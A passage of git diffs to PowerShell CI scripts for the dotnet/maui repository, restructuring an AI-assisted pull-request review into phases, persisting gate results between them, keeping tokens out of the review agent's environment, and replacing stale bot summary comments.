     Write-Host "  📝 HEAD: $headCommit" -ForegroundColor Gray
+}
+
+} # end if ($runSetup)
+
+# End of Setup phase — write sentinel and exit early
+if ($Phase -eq 'Setup') {
+    # Sentinel signals to Tasks 2-4 that Setup completed successfully (PR merged).
+    $sentinelDir = if ($TrustedScriptsDir) {
+        Split-Path $TrustedScriptsDir -Parent
+    } else {
+        $d = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate"
+        New-Item -ItemType Directory -Force -Path $d | Out-Null
+        $d
+    }
+    "OK" | Set-Content (Join-Path $sentinelDir "setup-complete") -Encoding UTF8
+    Write-Host "✅ Setup phase complete" -ForegroundColor Green
+    if ($LogFile) { Stop-Transcript -ErrorAction SilentlyContinue | Out-Null }
+    exit 0
 }
 
 # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ──────
@@ -467,10 +522,12 @@ function Invoke-CopilotStep {
     }
 
     # Use JSON output format to stream live progress of agent activity.
+    # --secret-env-vars: defense-in-depth — strips named tokens from copilot's
+    # shell/MCP subprocess env even if they somehow appear (e.g., via variable groups).
     # Model is overridable via $env:COPILOT_REVIEW_MODEL so contributors without internal-model access
     # can run this script (e.g., with 'claude-opus-4.6' or 'claude-sonnet-4.6').
     $copilotModel = if ($env:COPILOT_REVIEW_MODEL) { $env:COPILOT_REVIEW_MODEL } else { 'gpt-5.5' }
-    & copilot -p $Prompt --allow-all --output-format json --model $copilotModel 2>&1 | ForEach-Object {
+    & copilot -p $Prompt --allow-all --output-format json --model $copilotModel --secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN 2>&1 | ForEach-Object {
         $line = $_.ToString()
         try {
             $event = $line | ConvertFrom-Json -ErrorAction Stop
@@ -613,6 +670,8 @@ function Invoke-CopilotStep {
 #  STEP 2: DETECT UI Test Categories (detection only — no pipeline trigger)
 # ═════════════════════════════════════════════════════════════════════════════
 
+if ($runGate) {
+
 Write-Host ""
 Write-Host "╔═══════════════════════════════════════════════════════════╗" -ForegroundColor Cyan
 Write-Host "║  STEP 2: DETECT UI TEST CATEGORIES                       ║" -ForegroundColor Cyan
@@ -704,7 +763,7 @@ Write-Host "║  STEP 3: RUN DETECTED UI TESTS                            ║" -
 Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
 
 $uitestRunResult = "SKIPPED"
-$uitestRunnerScript = Join-Path $PSScriptRoot "BuildAndRunHostApp.ps1"
+$uitestRunnerScript = Join-Path $ScriptsDir "BuildAndRunHostApp.ps1"
 
 if ($uitestCategories -eq 'NONE') {
     Write-Host "  ⏭️  Skipped — detection returned NONE (no UI-relevant changes)" -ForegroundColor DarkGray
@@ -743,7 +802,7 @@ if ($uitestCategories -eq 'NONE') {
         # turning into "119 OneTimeSetUp timeouts" in the AI summary.
         $catLogPath = Join-Path $uitestRunOutputDir ("$cat-output.log")
         $catStart = Get-Date
-        $sharedRunner = Join-Path $PSScriptRoot "shared/Invoke-UITestWithRetry.ps1"
+        $sharedRunner = Join-Path $ScriptsDir "shared/Invoke-UITestWithRetry.ps1"
         $runResult = $null
         $testOutput = @()
         $testExitCode = -1
@@ -867,7 +926,7 @@ if ($uitestCategories -eq 'NONE') {
             # If $envErrHit was set above, use that — the retry loop already
             # detected an env error and exhausted retries.
             # Load shared env-error patterns (single source of truth).
-            $sharedPatternsScript = Join-Path $PSScriptRoot "shared/Get-EnvErrorPatterns.ps1"
+            $sharedPatternsScript = Join-Path $ScriptsDir "shared/Get-EnvErrorPatterns.ps1"
             if (Test-Path $sharedPatternsScript) {
                 . $sharedPatternsScript
                 $infraSignals = Get-EnvErrorPatterns
@@ -1144,7 +1203,7 @@ Write-Host "║  STEP 4: REGRESSION CROSS-REFERENCE                      ║" -F
 Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Cyan
 
 $regressionOutputDir = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/regression-check"
-$regressionScript = Join-Path $PSScriptRoot "Find-RegressionRisks.ps1"
+$regressionScript = Join-Path $ScriptsDir "Find-RegressionRisks.ps1"
 if (Test-Path $regressionScript) {
     try {
         & $regressionScript -PRNumber $PRNumber -OutputDir $regressionOutputDir
@@ -1348,7 +1407,7 @@ New-Item -ItemType Directory -Force -Path $gateOutputDir | Out-Null
 
 # Detect tests in PR
 Write-Host "  🔍 Detecting tests in PR #$PRNumber..." -ForegroundColor Cyan
-$testDetectScript = Join-Path $PSScriptRoot "shared/Detect-TestsInDiff.ps1"
+$testDetectScript = Join-Path $ScriptsDir "shared/Detect-TestsInDiff.ps1"
 if (Test-Path $testDetectScript) {
     $testDetectScript = (Resolve-Path $testDetectScript).Path
     & pwsh -NoProfile -File $testDetectScript -PRNumber $PRNumber 2>&1 | ForEach-Object { Write-Host "    $_" }
@@ -1360,7 +1419,7 @@ if (Test-Path $testDetectScript) {
 $gatePlatform = if ($Platform) { $Platform } else { "android" }
 Write-Host "  🧪 Running gate on platform: $gatePlatform" -ForegroundColor Cyan
 
-$verifyScript = [System.IO.Path]::GetFullPath((Join-Path $PSScriptRoot "../skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1"))
+$verifyScript = [System.IO.Path]::GetFullPath((Join-Path $SkillsDir "verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1"))
 if (-not (Test-Path $verifyScript)) {
     Write-Host "  ❌ verify-tests-fail.ps1 not found at: $verifyScript" -ForegroundColor Red
     # $gateExitCode = 1 ensures the switch at line ~561 produces $gateResult = "FAILED"
@@ -1571,47 +1630,34 @@ $gateLogTail
     }
 }
 
-# Post gate result as a separate PR comment
-$postGateScript = Join-Path $PSScriptRoot "post-gate-comment.ps1"
-if (Test-Path $postGateScript) {
-    try {
-        if ($DryRun) {
-            & $postGateScript -PRNumber $PRNumber -DryRun
-        } else {
-            & $postGateScript -PRNumber $PRNumber
-        }
-    } catch {
-        Write-Host "  ⚠️ Failed to post gate comment (non-fatal): $_" -ForegroundColor Yellow
-    }
+# Persist gate result so other phases can read it
+$gateVerdictDir = if ($TrustedScriptsDir) {
+    Split-Path $TrustedScriptsDir -Parent
 } else {
-    Write-Host "  ⚠️ post-gate-comment.ps1 not found" -ForegroundColor Yellow
+    $d = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate"
+    New-Item -ItemType Directory -Force -Path $d | Out-Null
+    $d
 }
+$gateResult | Set-Content (Join-Path $gateVerdictDir "gate-result.txt") -Encoding UTF8
+Write-Host "  📄 Gate result persisted: $gateResult" -ForegroundColor Gray
 
-# Apply gate result label
-$gatePassLabel = "s/agent-gate-passed"
-$gateFaillabel = "s/agent-gate-failed"
-$gateSkipLabel = "s/agent-gate-skipped"
-$allGateLabels = @($gatePassLabel, $gateFaillabel, $gateSkipLabel)
+} # end if (-not $skipGateAndTryFix)
 
-$addLabel = switch ($gateResult) {
-    "PASSED"  { $gatePassLabel }
-    "SKIPPED" { $gateSkipLabel }
-    default   { $gateFaillabel }
-}
-$removeLabels = $allGateLabels | Where-Object { $_ -ne $addLabel }
+} # end if ($runGate)
 
-if (-not $DryRun) {
-    foreach ($lbl in $removeLabels) {
-        gh pr edit $PRNumber --remove-label $lbl --repo dotnet/maui 2>$null | Out-Null
-    }
-    gh pr edit $PRNumber --add-label $addLabel --repo dotnet/maui 2>$null | Out-Null
-    if ($LASTEXITCODE -eq 0) {
-        Write-Host "  🏷️ Label: $addLabel" -ForegroundColor Cyan
+# ─── Phase: CopilotReview ──────────────────────────────────────────────────
+if ($runCopilotReview) {
+
+# Restore gate result from file when running in phased mode
+if ($Phase -eq 'CopilotReview') {
+    $gateVerdictFile = Join-Path (Split-Path $TrustedScriptsDir -Parent) "gate-result.txt"
+    if (Test-Path $gateVerdictFile) {
+        $gateResult = (Get-Content $gateVerdictFile -Raw).Trim()
+        Write-Host "  📄 Restored gate result: $gateResult" -ForegroundColor Gray
     } else {
-        Write-Host "  ⚠️ Failed to apply label $addLabel" -ForegroundColor Yellow
+        $gateResult = "SKIPPED"
+        Write-Host "  ⚠️ Gate result file not found — defaulting to SKIPPED" -ForegroundColor Yellow
     }
-} else {
-    Write-Host "  [DRY RUN] Would set label: $addLabel" -ForegroundColor Magenta
 }
 
 # Restore review branch
@@ -1804,7 +1850,7 @@ git checkout $reviewBranch 2>$null | Out-Null
 # Pre-flight (Step 6) wrote `ai-categories.md`; re-run detection now so the
 # unified comment reflects all three tiers before Step 7 posts.
 $aiCategoriesFile = Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/uitests/ai-categories.md"
-if ((Test-Path $detectScript) -and (Test-Path $aiCategoriesFile)) {
+if ($detectScript -and (Test-Path $detectScript) -and (Test-Path $aiCategoriesFile)) {
     try {
         # Pass as a single string (the script declares [string]$AiCategories);
         # an array would not bind correctly across the pwsh -File boundary.
@@ -1864,7 +1910,63 @@ if ((Test-Path $detectScript) -and (Test-Path $aiCategoriesFile)) {
     }
 }
 
-}  # END TEMP SKIP wrapper for STEP 5 (Gate) + STEP 6 (Try-Fix) — see $skipGateAndTryFix above
+} # end if ($runCopilotReview)
+
+# ─── Phase: Post ────────────────────────────────────────────────────────────
+if ($runPost) {
+
+# Restore gate result from file when running in phased mode
+if ($Phase -eq 'Post') {
+    $gateVerdictFile = Join-Path (Split-Path $TrustedScriptsDir -Parent) "gate-result.txt"
+    if (Test-Path $gateVerdictFile) {
+        $gateResult = (Get-Content $gateVerdictFile -Raw).Trim()
+    } else {
+        $gateResult = "SKIPPED"
+    }
+}
+
+# ─── Gate posting (moved here so only the Post task needs GH_TOKEN) ──────
+$postGateScript = Join-Path $ScriptsDir "post-gate-comment.ps1"
+if (Test-Path $postGateScript) {
+    try {
+        if ($DryRun) {
+            & $postGateScript -PRNumber $PRNumber -DryRun
+        } else {
+            & $postGateScript -PRNumber $PRNumber
+        }
+    } catch {
+        Write-Host "  ⚠️ Failed to post gate comment (non-fatal): $_" -ForegroundColor Yellow
+    }
+} else {
+    Write-Host "  ⚠️ post-gate-comment.ps1 not found" -ForegroundColor Yellow
+}
+
+# Apply gate result label
+$gatePassLabel = "s/agent-gate-passed"
+$gateFaillabel = "s/agent-gate-failed"
+$gateSkipLabel = "s/agent-gate-skipped"
+$allGateLabels = @($gatePassLabel, $gateFaillabel, $gateSkipLabel)
+
+$addLabel = switch ($gateResult) {
+    "PASSED"  { $gatePassLabel }
+    "SKIPPED" { $gateSkipLabel }
+    default   { $gateFaillabel }
+}
+$removeLabels = $allGateLabels | Where-Object { $_ -ne $addLabel }
+
+if (-not $DryRun) {
+    foreach ($lbl in $removeLabels) {
+        gh pr edit $PRNumber --remove-label $lbl --repo dotnet/maui 2>$null | Out-Null
+    }
+    gh pr edit $PRNumber --add-label $addLabel --repo dotnet/maui 2>$null | Out-Null
+    if ($LASTEXITCODE -eq 0) {
+        Write-Host "  🏷️ Label: $addLabel" -ForegroundColor Cyan
+    } else {
+        Write-Host "  ⚠️ Failed to apply label $addLabel" -ForegroundColor Yellow
+    }
+} else {
+    Write-Host "  [DRY RUN] Would set label: $addLabel" -ForegroundColor Magenta
+}
 
 # ═════════════════════════════════════════════════════════════════════════════
 #  STEP 7: Post AI Summary Comment (direct script invocation)
@@ -1877,7 +1979,7 @@ Write-Host "╔═════════════════════�
 Write-Host "║  STEP 7: POST AI SUMMARY                                  ║" -ForegroundColor Magenta
 Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Magenta
 
-$summaryScriptsDir = Join-Path $RepoRoot ".github/scripts"
+$summaryScriptsDir = $ScriptsDir
 
 if ($env:DEFER_COMMENT_TO_STAGE3 -eq 'true') {
     Write-Host "  ⏭️ Deferred to Stage 3 (DEFER_COMMENT_TO_STAGE3=true)" -ForegroundColor Gray
@@ -2064,7 +2166,7 @@ Write-Host "╔═════════════════════�
 Write-Host "║  STEP 8: APPLY LABELS                                     ║" -ForegroundColor Blue
 Write-Host "╚═══════════════════════════════════════════════════════════╝" -ForegroundColor Blue
 
-$labelHelperPath = Join-Path $RepoRoot ".github/scripts/shared/Update-AgentLabels.ps1"
+$labelHelperPath = Join-Path $ScriptsDir "shared/Update-AgentLabels.ps1"
 if (Test-Path $labelHelperPath) {
     try {
         . $labelHelperPath
@@ -2076,6 +2178,8 @@ if (Test-Path $labelHelperPath) {
 } else {
     Write-Host "  ⚠️ Label helper not found — skipping" -ForegroundColor Yellow
 }
+
+} # end if ($runPost)
 
 # ═════════════════════════════════════════════════════════════════════════════
 #  Cleanup

--- a/.github/scripts/Review-PR.ps1
+++ b/.github/scripts/Review-PR.ps1
@@ -706,10 +706,10 @@ if (Test-Path $detectScript) {
 
         # Emit detected categories as an AzDO output variable so downstream
         # stages (RunDeepUITests, UpdateAISummaryComment) in ci-copilot.yml
-        # can read them via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.detectedCategories']).
+        # can read them via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunGate.detectedCategories']).
         # `isOutput=true` is required for cross-stage consumption; the
         # variable name is namespaced under the step's `name:` property
-        # in ci-copilot.yml (currently `RunReview`) by AzDO.
+        # in ci-copilot.yml (currently `RunGate`) by AzDO.
         # Local invocations (no $env:TF_BUILD) won't have an AzDO variable
         # store but the marker is harmless — gets ignored.
         # Emit detected categories. Blank = "run all", a specific string = categories,
@@ -1641,6 +1641,28 @@ $gateVerdictDir = if ($TrustedScriptsDir) {
 $gateResult | Set-Content (Join-Path $gateVerdictDir "gate-result.txt") -Encoding UTF8
 Write-Host "  📄 Gate result persisted: $gateResult" -ForegroundColor Gray
 
+# Persist regression data for CopilotReview phase (try-fix instructions)
+if ($risksData) {
+    try {
+        $risksData | ConvertTo-Json -Depth 10 -Compress | Set-Content (Join-Path $gateVerdictDir "regression-risks.json") -Encoding UTF8
+        if ($regressionTests -and $regressionTests.Count -gt 0) {
+            @($regressionTests) | ConvertTo-Json -Depth 5 -Compress | Set-Content (Join-Path $gateVerdictDir "regression-tests.json") -Encoding UTF8
+        }
+        if ($regrPlatform) {
+            $regrPlatform | Set-Content (Join-Path $gateVerdictDir "regression-platform.txt") -Encoding UTF8
+        }
+        Write-Host "  📄 Regression data persisted" -ForegroundColor Gray
+    } catch {
+        Write-Host "  ⚠️ Failed to persist regression data (non-fatal): $_" -ForegroundColor Yellow
+    }
+}
+
+# Persist detect script path and detected categories for Tier 3 refresh
+if ($detectScript) {
+    $detectScript | Set-Content (Join-Path $gateVerdictDir "detect-script-path.txt") -Encoding UTF8
+}
+$uitestCategories | Set-Content (Join-Path $gateVerdictDir "uitest-categories.txt") -Encoding UTF8
+
 } # end if (-not $skipGateAndTryFix)
 
 } # end if ($runGate)
@@ -1650,13 +1672,45 @@ if ($runCopilotReview) {
 
 # Restore gate result from file when running in phased mode
 if ($Phase -eq 'CopilotReview') {
-    $gateVerdictFile = Join-Path (Split-Path $TrustedScriptsDir -Parent) "gate-result.txt"
+    $gateVerdictDir = Split-Path $TrustedScriptsDir -Parent
+    $gateVerdictFile = Join-Path $gateVerdictDir "gate-result.txt"
     if (Test-Path $gateVerdictFile) {
         $gateResult = (Get-Content $gateVerdictFile -Raw).Trim()
         Write-Host "  📄 Restored gate result: $gateResult" -ForegroundColor Gray
     } else {
         $gateResult = "SKIPPED"
         Write-Host "  ⚠️ Gate result file not found — defaulting to SKIPPED" -ForegroundColor Yellow
+    }
+
+    # Restore regression data persisted by Gate phase
+    $risksFile = Join-Path $gateVerdictDir "regression-risks.json"
+    $testsFile = Join-Path $gateVerdictDir "regression-tests.json"
+    $platFile  = Join-Path $gateVerdictDir "regression-platform.txt"
+    if (Test-Path $risksFile) {
+        try {
+            $risksData = Get-Content $risksFile -Raw -Encoding UTF8 | ConvertFrom-Json
+            if (Test-Path $testsFile) {
+                $regressionTests = @(Get-Content $testsFile -Raw -Encoding UTF8 | ConvertFrom-Json)
+            }
+            if (Test-Path $platFile) {
+                $regrPlatform = (Get-Content $platFile -Raw).Trim()
+            } else {
+                $regrPlatform = if ($Platform) { $Platform } else { "android" }
+            }
+            Write-Host "  📄 Restored regression data ($($regressionTests.Count) tests)" -ForegroundColor Gray
+        } catch {
+            Write-Host "  ⚠️ Failed to restore regression data (non-fatal): $_" -ForegroundColor Yellow
+        }
+    }
+
+    # Restore detect script path and UI test categories for Tier 3 refresh
+    $detectPathFile = Join-Path $gateVerdictDir "detect-script-path.txt"
+    $catsFile       = Join-Path $gateVerdictDir "uitest-categories.txt"
+    if (Test-Path $detectPathFile) {
+        $detectScript = (Get-Content $detectPathFile -Raw).Trim()
+    }
+    if (Test-Path $catsFile) {
+        $uitestCategories = (Get-Content $catsFile -Raw).Trim()
     }
 }
 

--- a/.github/scripts/Review-PR.ps1
+++ b/.github/scripts/Review-PR.ps1
@@ -330,6 +330,20 @@ if ($Phase -eq 'Setup') {
     exit 0
 }
 
+# ─── Sentinel check: verify Setup completed before running later phases ───
+if ($Phase -and $Phase -ne 'Setup') {
+    $sentinelDir = if ($TrustedScriptsDir) {
+        Split-Path $TrustedScriptsDir -Parent
+    } else {
+        Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate"
+    }
+    $sentinelFile = Join-Path $sentinelDir "setup-complete"
+    if (-not (Test-Path $sentinelFile)) {
+        Write-Error "Setup phase did not complete (sentinel not found at '$sentinelFile'). Cannot proceed with -Phase $Phase."
+        exit 1
+    }
+}
+
 # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ──────
 # Extracts per-test results (Passed/Failed/Skipped) plus failure messages and
 # stack traces from raw stdout. Used by STEP 3 so the AI summary comment shows
@@ -1672,7 +1686,11 @@ if ($runCopilotReview) {
 
 # Restore gate result from file when running in phased mode
 if ($Phase -eq 'CopilotReview') {
-    $gateVerdictDir = Split-Path $TrustedScriptsDir -Parent
+    $gateVerdictDir = if ($TrustedScriptsDir) {
+        Split-Path $TrustedScriptsDir -Parent
+    } else {
+        Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate"
+    }
     $gateVerdictFile = Join-Path $gateVerdictDir "gate-result.txt"
     if (Test-Path $gateVerdictFile) {
         $gateResult = (Get-Content $gateVerdictFile -Raw).Trim()
@@ -1971,7 +1989,12 @@ if ($runPost) {
 
 # Restore gate result from file when running in phased mode
 if ($Phase -eq 'Post') {
-    $gateVerdictFile = Join-Path (Split-Path $TrustedScriptsDir -Parent) "gate-result.txt"
+    $gateVerdictDir = if ($TrustedScriptsDir) {
+        Split-Path $TrustedScriptsDir -Parent
+    } else {
+        Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate"
+    }
+    $gateVerdictFile = Join-Path $gateVerdictDir "gate-result.txt"
     if (Test-Path $gateVerdictFile) {
         $gateResult = (Get-Content $gateVerdictFile -Raw).Trim()
     } else {

--- a/.github/scripts/post-ai-summary-comment.ps1
+++ b/.github/scripts/post-ai-summary-comment.ps1
@@ -1,12 +1,14 @@
 #!/usr/bin/env pwsh
 <#
 .SYNOPSIS
-    Posts or updates the AI review summary comment on a GitHub Pull Request.
+    Posts the AI review summary comment on a GitHub Pull Request.
 
 .DESCRIPTION
     Maintains ONE comment per PR, identified by <!-- AI Summary --> marker.
+    Before posting a fresh comment, any older generated AI Summary comments are
+    removed. Existing session blocks are preserved in the newly posted comment.
     Each review run adds an expandable session keyed by HEAD commit SHA.
-    - Same commit SHA → replaces that session in-place.
+    - Same commit SHA → replaces that session in the newly posted comment.
     - New commit SHA  → prepends a new session (latest first).
     Older sessions stay collapsed; the newest is expanded by default.
 
@@ -22,7 +24,7 @@
     (gate-only update) and once after the review phases finish (full update).
 
     Any standalone legacy "<!-- AI Gate -->" comment from older versions of
-    the script is deleted after a successful post to avoid duplicates.
+    the script is deleted before the fresh comment is posted to avoid duplicates.
 
 .PARAMETER PRNumber
     The pull request number (required)
@@ -47,6 +49,11 @@ param(
 
 $ErrorActionPreference = "Stop"
 $MARKER = "<!-- AI Summary -->"
+
+$commentCleanupScript = Join-Path $PSScriptRoot "shared/Remove-StaleMauiBotComments.ps1"
+if (Test-Path $commentCleanupScript) {
+    . $commentCleanupScript
+}
 
 # ============================================================================
 # LOAD PHASE CONTENT
@@ -244,24 +251,23 @@ function Merge-Sessions {
 # ============================================================================
 
 Write-Host "Checking for existing review comment..." -ForegroundColor Yellow
-$existingCommentId = $null
 $existingBody = $null
+$existingCommentIds = @()
 
 $existingRaw = gh api "repos/dotnet/maui/issues/$PRNumber/comments" --paginate 2>$null
-$existingObj = $null
 if ($existingRaw) {
     try {
         $allComments = $existingRaw | ConvertFrom-Json
-        $existingObj = @($allComments | Where-Object { $_.body -and $_.body.Contains($MARKER) }) | Select-Object -Last 1
+        $existingObjs = @($allComments | Where-Object { $_.body -and $_.body.Contains($MARKER) })
+        if ($existingObjs.Count -gt 0) {
+            $existingCommentIds = @($existingObjs | ForEach-Object { $_.id })
+            $existingBodies = @($existingObjs | ForEach-Object { [string]$_.body })
+            $existingBody = $existingBodies -join "`n`n---`n`n"
+            Write-Host "✓ Found existing AI Summary comment(s): $($existingCommentIds -join ', ')" -ForegroundColor Green
+        }
     } catch {
         Write-Host "⚠️ Could not parse comments: $_" -ForegroundColor Yellow
     }
-}
-
-if ($existingObj -and $existingObj.id) {
-    $existingCommentId = $existingObj.id
-    $existingBody = $existingObj.body
-    Write-Host "✓ Found existing comment (ID: $existingCommentId)" -ForegroundColor Green
 }
 
 $authorPing = ""
@@ -269,16 +275,22 @@ if ($prAuthor) {
     $authorPing = "> 👋 @$prAuthor — new AI review results are available. Please review the latest session below."
 }
 
-if ($existingBody) {
-    # Merge new session into existing body
-    $mergedSessions = Merge-Sessions -ExistingBody $existingBody -NewSession $newSessionBlock -CommitSha7 $commitSha7
-
-    # Preserve any PR-FINALIZE section that may already exist
-    $finalizeSection = ""
-    $finalizePattern = '(?s)(<!-- SECTION:PR-FINALIZE -->.*?<!-- /SECTION:PR-FINALIZE -->)'
-    if ($existingBody -match $finalizePattern) {
-        $finalizeSection = "`n`n" + $Matches[1]
+$finalizeSection = ""
+$finalizePattern = '(?s)(<!-- SECTION:PR-FINALIZE -->.*?<!-- /SECTION:PR-FINALIZE -->)'
+if ($existingBodies -and $existingBodies.Count -gt 0) {
+    for ($i = $existingBodies.Count - 1; $i -ge 0; $i--) {
+        if ($existingBodies[$i] -match $finalizePattern) {
+            $finalizeSection = "`n`n" + $Matches[1]
+            break
+        }
     }
+}
+
+if ($existingBody) {
+    # Merge new session into all existing AI Summary bodies before deleting the
+    # old comments. This keeps prior session history even if retries created
+    # multiple generated comments.
+    $mergedSessions = Merge-Sessions -ExistingBody $existingBody -NewSession $newSessionBlock -CommitSha7 $commitSha7
 
     $commentBody = @"
 $MARKER
@@ -319,56 +331,35 @@ if ($DryRun) {
 }
 
 # ============================================================================
-# POST OR UPDATE COMMENT
+# DELETE STALE GENERATED COMMENTS, THEN POST COMMENT
 # ============================================================================
 
 $tempFile = [System.IO.Path]::GetTempFileName()
 try {
     @{ body = $commentBody } | ConvertTo-Json -Depth 10 | Set-Content -Path $tempFile -Encoding UTF8
 
-    if ($existingCommentId) {
-        Write-Host "Updating comment (ID: $existingCommentId)..." -ForegroundColor Yellow
-        try {
-            gh api --method PATCH "repos/dotnet/maui/issues/comments/$existingCommentId" --input $tempFile 2>&1 | Out-Null
-            if ($LASTEXITCODE -ne 0) { throw "PATCH failed" }
-            Write-Host "✅ Review comment updated" -ForegroundColor Green
-            Write-Output "COMMENT_ID=$existingCommentId"
-        } catch {
-            Write-Host "⚠️ Could not update comment $existingCommentId : $_" -ForegroundColor Yellow
-            $newJson = gh api --method POST "repos/dotnet/maui/issues/$PRNumber/comments" --input $tempFile
-            $newId = ($newJson | ConvertFrom-Json).id
-            Write-Host "✅ Review comment posted (ID: $newId)" -ForegroundColor Green
-            Write-Output "COMMENT_ID=$newId"
-        }
-    } else {
-        Write-Host "Creating new review comment..." -ForegroundColor Yellow
-        $newJson = gh api --method POST "repos/dotnet/maui/issues/$PRNumber/comments" --input $tempFile
-        $newId = ($newJson | ConvertFrom-Json).id
-        Write-Host "✅ Review comment posted (ID: $newId)" -ForegroundColor Green
-        Write-Output "COMMENT_ID=$newId"
+    if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) {
+        Remove-StaleMauiBotIssueComments `
+            -PRNumber $PRNumber `
+            -IncludeAISummary `
+            -IncludeLegacyGate `
+            -IncludeMergeConflict `
+            -IncludeTryFix `
+            -Reason "stale generated PR review comment"
     }
+
+    if (Get-Command Dismiss-StaleMauiBotTryFixReviews -ErrorAction SilentlyContinue) {
+        Dismiss-StaleMauiBotTryFixReviews -PRNumber $PRNumber
+    }
+
+    Write-Host "Creating new review comment..." -ForegroundColor Yellow
+    $newJson = gh api --method POST "repos/dotnet/maui/issues/$PRNumber/comments" --input $tempFile
+    if ($LASTEXITCODE -ne 0) {
+        throw "Failed to post AI Summary comment"
+    }
+    $newId = ($newJson | ConvertFrom-Json).id
+    Write-Host "✅ Review comment posted (ID: $newId)" -ForegroundColor Green
+    Write-Output "COMMENT_ID=$newId"
 } finally {
     Remove-Item $tempFile -ErrorAction SilentlyContinue
-}
-
-# ============================================================================
-# CLEAN UP LEGACY STANDALONE GATE COMMENTS
-# ============================================================================
-# Earlier versions of this workflow posted gate results in a separate comment
-# marked with <!-- AI Gate -->. Now that the gate is included as a section in
-# this unified comment, those legacy comments are duplicates and should go.
-
-try {
-    $legacyMarker = "<!-- AI Gate -->"
-    $allRaw = gh api "repos/dotnet/maui/issues/$PRNumber/comments" --paginate 2>$null
-    if ($allRaw) {
-        $allComments = $allRaw | ConvertFrom-Json
-        $legacy = @($allComments | Where-Object { $_.body -and $_.body.Contains($legacyMarker) })
-        foreach ($lc in $legacy) {
-            Write-Host "🧹 Deleting legacy gate comment (ID: $($lc.id))..." -ForegroundColor Gray
-            gh api --method DELETE "repos/dotnet/maui/issues/comments/$($lc.id)" 2>&1 | Out-Null
-        }
-    }
-} catch {
-    Write-Host "⚠️ Legacy gate-comment cleanup failed (non-fatal): $_" -ForegroundColor Yellow
 }

--- a/.github/scripts/post-ai-summary-comment.ps1
+++ b/.github/scripts/post-ai-summary-comment.ps1
@@ -79,6 +79,34 @@ $phases = [ordered]@{
     "report"           = @{ File = "report/content.md";             Icon = "📋"; Title = "Report — Final Recommendation" }
 }
 
+function Test-PhaseContentIsNoOp {
+    param(
+        [Parameter(Mandatory = $true)]
+        [string]$PhaseKey,
+
+        [Parameter(Mandatory = $true)]
+        [string]$Content
+    )
+
+    $normalized = ($Content -replace "`r`n", "`n").Trim()
+
+    switch ($PhaseKey) {
+        "uitests" {
+            return $normalized -match '^No UI test categories needed for this PR \(no UI-relevant changes\)\.?$'
+        }
+        "regression-check" {
+            $withoutHeading = ($normalized -replace '(?m)^##\s+.*Regression Cross-Reference\s*\n+', '').Trim()
+            return (
+                $withoutHeading -match '^🟢\s+No implementation files modified\s+[—-]\s+skipping regression cross-reference\.\s*$' -or
+                $withoutHeading -match '^🟢\s+No regression risks detected\.\s+No labeled bug-fix PRs in the last \d+ months touched the modified files\.\s*$'
+            )
+        }
+        default {
+            return $false
+        }
+    }
+}
+
 # ─── Gate content (rendered first, always open) ───
 $gateSection = $null
 $gateFilePath = Join-Path $PRAgentDir "gate/content.md"
@@ -111,6 +139,11 @@ foreach ($key in $phases.Keys) {
     if (Test-Path $filePath) {
         $content = Get-Content $filePath -Raw -Encoding UTF8
         if (-not [string]::IsNullOrWhiteSpace($content)) {
+            if (Test-PhaseContentIsNoOp -PhaseKey $key -Content $content) {
+                Write-Host "  ⏭️  $key (no actionable content)" -ForegroundColor Gray
+                continue
+            }
+
             Write-Host "  ✅ $key ($((Get-Item $filePath).Length) bytes)" -ForegroundColor Green
             # For uitests, make title dynamic: "UI Tests — Cat1, Cat2"
             $phaseTitle = "$($phase.Icon) $($phase.Title)"

--- a/.github/scripts/post-ai-summary-comment.ps1
+++ b/.github/scripts/post-ai-summary-comment.ps1
@@ -6,11 +6,8 @@
 .DESCRIPTION
     Maintains ONE comment per PR, identified by <!-- AI Summary --> marker.
     Before posting a fresh comment, any older generated AI Summary comments are
-    removed. Existing session blocks are preserved in the newly posted comment.
-    Each review run adds an expandable session keyed by HEAD commit SHA.
-    - Same commit SHA → replaces that session in the newly posted comment.
-    - New commit SHA  → prepends a new session (latest first).
-    Older sessions stay collapsed; the newest is expanded by default.
+    removed. The replacement comment contains only the latest review session,
+    keyed by the current HEAD commit SHA.
 
     After posting, the PR author is @-mentioned so they know to review.
 
@@ -197,62 +194,12 @@ $sessionMarkerEnd
 "@
 
 # ============================================================================
-# MERGE WITH EXISTING SESSIONS
-# ============================================================================
-
-function Merge-Sessions {
-    param(
-        [string]$ExistingBody,
-        [string]$NewSession,
-        [string]$CommitSha7
-    )
-
-    # Extract all session blocks from existing body
-    $sessionPattern = '(?s)<!-- SESSION:([a-f0-9]+) START -->.*?<!-- SESSION:\1 END -->'
-    $existingSessions = [regex]::Matches($ExistingBody, $sessionPattern)
-
-    $sessions = [ordered]@{}
-    foreach ($match in $existingSessions) {
-        $sha = $match.Groups[1].Value
-        $sessions[$sha] = $match.Value
-    }
-
-    # Replace or prepend new session
-    $sessions[$CommitSha7] = $NewSession
-
-    # Rebuild: newest session first (the one we just added/replaced)
-    $orderedKeys = @($CommitSha7) + @($sessions.Keys | Where-Object { $_ -ne $CommitSha7 })
-
-    $allSessions = @()
-    $isFirst = $true
-    foreach ($sha in $orderedKeys) {
-        $block = $sessions[$sha]
-        if ($isFirst) {
-            # Ensure ONLY the outer (session-wrapping) details tag is open. Inner
-            # phase tags must keep their original open/collapsed state — we used
